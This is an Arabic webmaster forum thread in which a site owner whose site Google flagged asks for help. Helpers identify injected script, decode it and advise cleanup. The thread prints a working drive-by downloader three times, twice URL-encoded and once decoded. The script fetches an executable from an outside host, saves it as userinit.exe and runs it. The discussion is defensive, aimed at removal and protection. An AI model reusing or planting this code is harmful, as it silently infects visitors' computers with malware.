النتائج 1 إلى 6 من 6

الموضوع: طلب فزعه من خبراء جوجل و StopBadware

  1. #1
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    52

    طلب فزعه من خبراء جوجل و StopBadware



    السلام عليكم ورحمه الله وبركاته

    اخواني انا موقعي جوجل زعلان عليه وكاتب قد يضر هذا الموقع جهازك

    المهم لي اسبوع وانا مراسلات وحالتي حاله بين جوجل و StopBadware وشركه السيرفر وتم فحص السيرفر بالكامل ولا حصلنا اي شي !!

    واليوم ردو علي StopBadware بالرساله

    According to our review of your website, your site contains a potentially damaging exploit. For example, the source code for http://www.winpooch
    .com/version.php?cur
    rent=0.6.6
    contains the following suspicious code:

    <SCRIPT
    LANGUAGE="Javascript">
    <!--
    var Words
    ="%20%3Cscript%20language%3D%22VBSc
    ript%22%3E%20%0D%0A%20%20%20%20on%20erro
    r%20resume%20next%20%0D%0A%20%20%20%20%2
    71%20%0D%0A%20%20%20%20dl%20%3D%22http%3
    A//www.shahed-barmada.net/up/msn.exe%22%
    20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%
    20%20Set%20df%20%3D%20document.createEle
    ment%28%22object%22%29%20%0D%0A%20%20%20
    %20%271%20%0D%0A%20%20%20%20df.setAttrib
    ute%20%22classid%22%2C%20%22clsid%3ABD96
    C556-65A3-11D0-983A-00C04FC29E36%22%20%0
    D%0A%20%20%20%20%271%20%0D%0A%20%20%20%2
    0str%3D%22Microsoft.XMLHTTP%22%20%0D%0A%
    20%20%20%20%271%20%0D%0A%20%20%20%20Set%
    20x%20%3D%20df.CreateObject%28str%2C%22%
    22%29%20%0D%0A%20%20%20%20%271%20%0D%0A%
    20%20%20%20a1%3D%22Adodb.%22%20%0D%0A%20
    %20%20%20a4%3D%22Stream%22%20%0D%0A%20%2
    0%20%20%271%20%0D%0A%20%20%20%20str1%3Da
    1%26a4%20%0D%0A%20%20%20%20str5%3Dstr1%2
    0%0D%0A%20%20%20%20%271%20%0D%0A%20%20%2
    0%20set%20S%20%3D%20df.createobject%28st
    r5%2C%22%22%29%20%0D%0A%20%20%20%20%271%
    20%0D%0A%20%20%20%20S.type%20%3D%201%20%
    0D%0A%20%20%20%20str6%3D%22GET%22%20%0D%
    0A%20%20%20%20%271%20%0D%0A%20%20%20%20x
    .Open%20str6%2C%20dl%2C%20False%20%0D%0A
    %20%20%20%20x.Send%20%0D%0A%20%20%20%20%
    271%20%0D%0A%20%20%20%20fname1%3D%22user
    init.exe%22%20%0D%0A%20%20%20%20%271%20%
    0D%0A%20%20%20%20set%20F%20%3D%20df.crea
    teobject%28%22Scripting.FileSystemObject
    %22%2C%22%22%29%20%0D%0A%20%20%20%20%271
    %20%0D%0A%20%20%20%20set%20tmp%20%3D%20F
    .GetSpecialFolder%282%29%20%0D%0A%20%20%
    20%20%271%20%0D%0A%20%20%20%20fname1%3D%
    20F.BuildPath%28tmp%2Cfname1%29%20%0D%0A
    %20%20%20%20%271%20%0D%0A%20%20%20%20S.o
    pen%20%0D%0A%20%20%20%20%271%20%0D%0A%20
    %20%20%20S.write%20x.responseBody%20%0D%
    0A%20%20%20%20%271%20%0D%0A%20%20%20%20S
    .savetofile%20fname1%2C2%20%0D%0A%20%20%
    20%20%271%20%0D%0A%20%20%20%20S.close%20
    %0D%0A%20%20%20%20%271%20%0D%0A%20%20%20
    %20set%20Q%20%3D%20df.createobject%28%22
    Shell.Application%22%2C%22%22%29%20%0D%0
    A%20%20%20%20%272%20%0D%0A%20%20%20%20Q.
    ShellExecute%20fname1%2C%22%22%2C%22%22%
    20%0D%0A%20%20%20%20%271%20%0D%0A%3C/scr
    ipt%3E" //&Egrave;&iacute;&auml; &aring;&Ccedil;&Ecirc;&iacute;&auml; &Ccedil;&aacute;&Uacute;&aacute;&Ccedil;&atilde;&Ecirc;&iacute;&auml; &Ecirc;&Ouml;&Uacute;
    &Ccedil;&aacute;&szlig;&aelig;&Iuml; &Ccedil;&aacute;&atilde;&Ocirc;&Yacute;&Ntilde;
    function SetNewWords()
    {
    var NewWords;
    NewWords = unescape(Words);
    document.write(NewWords);
    }
    SetNewWords();
    // -->
    </SCRIPT>


    This type of code may allow parties other than yourself to load content onto user's computers via your website. In such a case, simply visiting your site would cause users to become infected by malware, spyware, or other badware that is loaded from a remote site. In addition, the party that placed the code on your site could inject additional code onto your site with potentially undesireable consequences. Even if your site is not currently distributing badware (for example, if the site that the code is pointing to is not currently "live"), your site has the potential to become a distributor of badware at any time due to the exploit noted above. Because of this continuing danger, Google will not be removing the warning page for your site at this time.

    We strongly recommend removing any code that is currently or has the potential to distribute badware and securing your site against future code injections. Otherwise, it is likely that your website will be hacked again. If your site has been hacked, then simply removing injected code from your site is not enough. You will also need to work with your hosting provider or website administrator to fix all security vulnerabilities associated with your site.

    We have created a webpage that has tips for webmasters on how to clean and secure their websites at http://stopbadware.org/home/security. Please read this page to find out how to find, remove, and prevent badware appearing on your website. We recommend paying special attention to the sections on Hacking Attacks. We also have answers to commonly asked questions from site owners who are the subject of Google warnings at http://stopbadware.org/home/faq#partnerwarnings.

    Once you have secured your site, removed any traces of badware or bad code, and discontinued linking to any sites that install badware, you may submit another request for review and we will retest your site.

    The StopBadware Team
    دخت وانا اترجم من يلقى لي الحل يكون والله يجزاه خير الجزاءاللي يعرف شلون نرجع الموقع ياليت ما يبخل علينا اخوكم







  2. #2
    عضو سوبر نشيط
    تاريخ التسجيل
    Dec 2004
    المشاركات
    660


    الصفحه الرئيسية حبيب فيها رابط تنفيذي
    <SCRIPT LANGUAGE="Javascript">
    <!--
    var Words ="%20%3Cscript%20language%3D%22VBScript%22%3E%20%0D%0A%20%20%20%20on%20error%20resume%20next%20%0D%0 A%20%20%20%20%271%20%0D%0A%20%20%20%20dl%20%3D%22http%3A//www.shahed-barmada.net/up/msn.exe%22%20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20Set%20df%20%3D%20document.createElement%28%2 2object%22%29%20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20df.setAttribute%20%22classid%22%2C%20%22c lsid%3ABD96C556-65A3-11D0-983A-00C04FC29E36%22%20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20str%3D%22Microsoft.XMLHTTP%22%20%0D%0A% 20%20%20%20%271%20%0D%0A%20%20%20%20Set%20x%20%3D%20df.CreateObject%28str%2C%22%22%29%20%0D%0A%20%20 %20%20%271%20%0D%0A%20%20%20%20a1%3D%22Adodb.%22%20%0D%0A%20%20%20%20a4%3D%22Stream%22%20%0D%0A%20%2 0%20%20%271%20%0D%0A%20%20%20%20str1%3Da1%26a4%20%0D%0A%20%20%20%20str5%3Dstr1%20%0D%0A%20%20%20%20% 271%20%0D%0A%20%20%20%20set%20S%20%3D%20df.createobject%28str5%2C%22%22%29%20%0D%0A%20%20%20%20%271% 20%0D%0A%20%20%20%20S.type%20%3D%201%20%0D%0A%20%20%20%20str6%3D%22GET%22%20%0D%0A%20%20%20%20%271%2 0%0D%0A%20%20%20%20x.Open%20str6%2C%20dl%2C%20False%20%0D%0A%20%20%20%20x.Send%20%0D%0A%20%20%20%20% 271%20%0D%0A%20%20%20%20fname1%3D%22userinit.exe%22%20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20set %20F%20%3D%20df.createobject%28%22Scripting.FileSystemObject%22%2C%22%22%29%20%0D%0A%20%20%20%20%271 %20%0D%0A%20%20%20%20set%20tmp%20%3D%20F.GetSpecialFolder%282%29%20%0D%0A%20%20%20%20%271%20%0D%0A%2 0%20%20%20fname1%3D%20F.BuildPath%28tmp%2Cfname1%29%20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20S.o pen%20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20S.write%20x.responseBody%20%0D%0A%20%20%20%20%271%2 0%0D%0A%20%20%20%20S.savetofile%20fname1%2C2%20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20S.close%20 %0D%0A%20%20%20%20%271%20%0D%0A%20%20%20%20set%20Q%20%3D%20df.createobject%28%22Shell.Application%22 %2C%22%22%29%20%0D%0A%20%20%20%20%272%20%0D%0A%20%20%20%20Q.ShellExecute%20fname1%2C%22%22%2C%22%22% 20%0D%0A%20%20%20%20%271%20%0D%0A%3C/script%3E" //بين هاتين العلامتين تضع الكود المشفر
    function SetNewWords()
    {
    var NewWords;
    NewWords = unescape(Words);
    document.write(NewWords);
    }
    SetNewWords();
    // -->
    </SCRIPT>
    افتح السورس وتشوف كل شي احذف هذ وراسلهم

    تحية طيبة





    __________________
    يا رب رحماك يوم القاك

  3. #3
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    52


    الف شكر اخوي

    بس حبيت اعرف من وين جاء هالكود !!

    وكيف احمي الاندكس مستقبلا من مثله ....

    تقديري للجميع








  4. هاهو الكود الموجود في موقعك بعد فك التشفير عنه
    كود:
    <SCRIPT LANGUAGE="Javascript">
    <!--
    var Words =" <script language="VBScript"> 
        on error resume next 
    %0 A    '1 
        dl ="http://www.shahed-barmada.net/up/msn.exe" 
        '1 
        Set df = document.createElement(%2 2object") 
        '1 
        df.setAttribute "classid", "c lsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 
        '1 
        str="Microsoft.XMLHTTP" 
    % 20   '1 
        Set x = df.CreateObject(str,"") 
         '1 
        a1="Adodb." 
        a4="Stream" 
     %2 0  '1 
        str1=a1&a4 
        str5=str1 
        % 271 
        set S = df.createobject(str5,"") 
        '1% 20
        S.type = 1 
        str6="GET" 
        '1%2 0
        x.Open str6, dl, False 
        x.Send 
        % 271 
        fname1="userinit.exe" 
        '1 
        set  F = df.createobject("Scripting.FileSystemObject","") 
        '1  
        set tmp = F.GetSpecialFolder(2) 
        '1 
    %2 0   fname1= F.BuildPath(tmp,fname1) 
        '1 
        S.o pen 
        '1 
        S.write x.responseBody 
        '1%2 0
        S.savetofile fname1,2 
        '1 
        S.close  
        '1 
        set Q = df.createobject("Shell.Application" ,"") 
        '2 
        Q.ShellExecute fname1,"",""% 20
        '1 
    </script>" //بين هاتين العلامتين تضع الكود المشفر
    function SetNewWords()
    {
    var NewWords;
    NewWords = unescape(Words);
    document.write(NewWords);
    }
    SetNewWords();
    // -->
    </SCRIPT>







  5. #5
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    52


    مشكور اخوي سيف ..

    تم ازاله الكود ولكن سؤالي كيف جاء وكيف احمي موقعي من مثله !

    والف شكر








  6. - كيف جاء ؟ غالبا فايروس اصاب برنامج الاف تى بي الذى تستخدمه وبالتالى انتقل لاندكس موقعك عند استخدام البرنامج لتحويل الملفات من او الى موقعك
    - كيف تحمى موقعك منه ؟
    اقتراحات :
    - امسح البرنامج من جهازك
    - يفضل ان تفرمط الهارد وتنزل نسخه ويندوز جديده
    - استخدام برنامج حمايه قوى في جهازك لمنع التكرار










ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض